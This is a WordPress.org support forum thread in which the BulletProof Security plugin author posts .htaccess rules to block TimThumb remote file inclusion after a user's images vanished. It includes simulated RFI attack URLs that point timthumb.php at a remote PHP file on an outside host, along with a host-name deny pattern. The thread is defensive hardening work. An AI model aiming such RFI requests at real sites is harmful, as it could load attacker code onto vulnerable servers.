WordPress.org

Ready to get started?Download WordPress

Forums

BulletProof Security
[resolved] Images diappeared (6 posts)

  1. agslk
    Member
    Posted 2 years ago #

    - WordPress : 3.3.1
    - PHP/MySQL : PHP 5 / MySQL 5
    - Theme : London Live
    - Url : http://www.leforumdessports.fr/blog/

    Hi,

    All images are missing after BPS installation.

    Someone can help me because i don't know how i need to change in the htaccess file.

    Thank you.

    http://wordpress.org/extend/plugins/bulletproof-security/

  2. agslk
    Member
    Posted 2 years ago #

    OK it is fixed.

  3. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    At some point i will change the .htaccess thumbnailer script default forbid rule to another set of .htaccess rules that will not block / forbid thumbnailer scripts by default. I need to ponder how to allow this without creating a "constant" that can be used as an exploit.

    I think it should be a rule using this general idea.

    RewriteCond %{REQUEST_FILENAME} (an actual real identifier in a hacking attempt).*(timthumb\.php|thumb\.php|thumbs\.php|phpthumb\.php|) [NC,OR]
    RewriteRule . - [F,L]
    

    My original goal of getting awareness up about this vulnerability has been achieved so i can now create such a rule. ;)

  4. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    This will be the official new TimThumb RFI .htaccess code in BPS .46.8
    if you want to use it now be my guest. ;)

    Test Results:

    Thumbnail image direct file request - 200
    - Images are displayed both in pages and when viewing individual image files
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://www.ait-pro.com/wordpress-testing-website/wp-content/uploads/2010/02/6t3fko.jpg&h=48&w=48&zc=1

    Results in a 404 - host name "booger" is not forbidden
    http://www.example.com/wordpress-testing-website/timthumb.php?src=http://booger.com.hostdail.com/fart.php

    Simulated RFI Hacking Attempt by Host that is Not Forbidden
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://booger.com.hostdail.com/fart.php

    Results:
    TimThumb version 1.19
    With Allow External Sites = True
    error reading file http://booger.com.hostdail.com/fart.php from remote host: Couldn't resolve host 'booger.com.hostdail.com'
    Query String : src=http://booger.com.hostdail.com/fart.php
    TimThumb version : 1.19

    Timthumb version 2.8
    with Allow External Sites = True
    The following error(s) occured:
    Error reading the URL you specified from remote host.Couldn't resolve host 'booger.com.hostdail.com'
    Query String : src=http://booger.com.hostdail.com/fart.php
    TimThumb version : 2.8

    Simulated RFI Hacking Attempt by Host that is Forbidden
    Results:
    TimThumb version 1.19 and 2.8
    Results in 403 and an additional 500 error - host name "picasa" is forbidden
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://picasa.com.hostdail.com/fart.php

    The New .htaccess Code:

    # PLUGINS AND VARIOUS EXPLOIT FILTER SKIP RULES
    # IMPORTANT!!! If you add or remove a skip rule you must change S= to the new skip number
    # Example: If RewriteRule S=5 is deleted than change S=6 to S=5, S=7 to S=6, etc.
    # Adminer MySQL management tool data populate
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/adminer/ [NC]
    RewriteRule . - [S=12]
    # Comment Spam Pack MU Plugin - CAPTCHA images not displaying
    RewriteCond %{REQUEST_URI} ^/wp-content/mu-plugins/custom-anti-spam/ [NC]
    RewriteRule . - [S=11]
    # Peters Custom Anti-Spam display CAPTCHA Image
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/peters-custom-anti-spam-image/ [NC]
    RewriteRule . - [S=10]
    # Status Updater plugin fb connect
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/fb-status-updater/ [NC]
    RewriteRule . - [S=9]
    # Stream Video Player - Adding FLV Videos Blocked
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/stream-video-player/ [NC]
    RewriteRule . - [S=8]
    # XCloner 404 or 403 error when updating settings
    RewriteCond %{REQUEST_URI} ^/wp-content/plugins/xcloner-backup-and-restore/ [NC]
    RewriteRule . - [S=7]
    # BuddyPress Logout Redirect
    RewriteCond %{QUERY_STRING} action=logout&redirect_to=http%3A%2F%2F(.*) [NC]
    RewriteRule . - [S=6]
    # redirect_to=
    RewriteCond %{QUERY_STRING} redirect_to=(.*) [NC]
    RewriteRule . - [S=5]
    # Login Plugins Password Reset And Redirect 1
    RewriteCond %{QUERY_STRING} action=resetpass&key=(.*) [NC]
    RewriteRule . - [S=4]
    # Login Plugins Password Reset And Redirect 2
    RewriteCond %{QUERY_STRING} action=rp&key=(.*) [NC]
    RewriteRule . - [S=3]
    
    # TimThumb Forbid RFI By Host Name But Allow Internal Requests
    RewriteCond %{QUERY_STRING} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC,OR]
    RewriteCond %{THE_REQUEST} ^.*(http|https|ftp)(%3A|:)(%2F|/)(%2F|/)(w){0,3}.?(blogger|picasa|blogspot|tsunami|petapolitik|photobucket|imgur|imageshack|wordpress\.com|img\.youtube|tinypic\.com|upload\.wikimedia|kkc|start-thegame).*$ [NC]
    RewriteRule .* index.php [F,L]
    RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
    RewriteRule . - [S=1]
  5. agslk
    Member
    Posted 2 years ago #

    I put your code.
    It seems to be ok.
    Thank you very much :o)

  6. AITpro
    Member
    Plugin Author

    Posted 2 years ago #

    Cool. thanks for the feedback. :)

    I'll be releasing BPS .46.8 probably around 1-18-2012 so I'll add this new TimThumb .htaccess code to AutoMagic in that release.

    And i made a typo in this example 200 test
    both domain names would be the same (example.com) in a direct request as opposed to a remote request. ;)

    Thumbnail image direct file request - 200
    - Images are displayed both in pages and when viewing individual image files
    http://www.example.com/wordpress-testing-website/wp-content/themes/bigfoot/includes/timthumb.php?src=http://www.example.com/wordpress-testing-website/wp-content/uploads/2010/02/6t3fko.jpg&h=48&w=48&zc=1

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic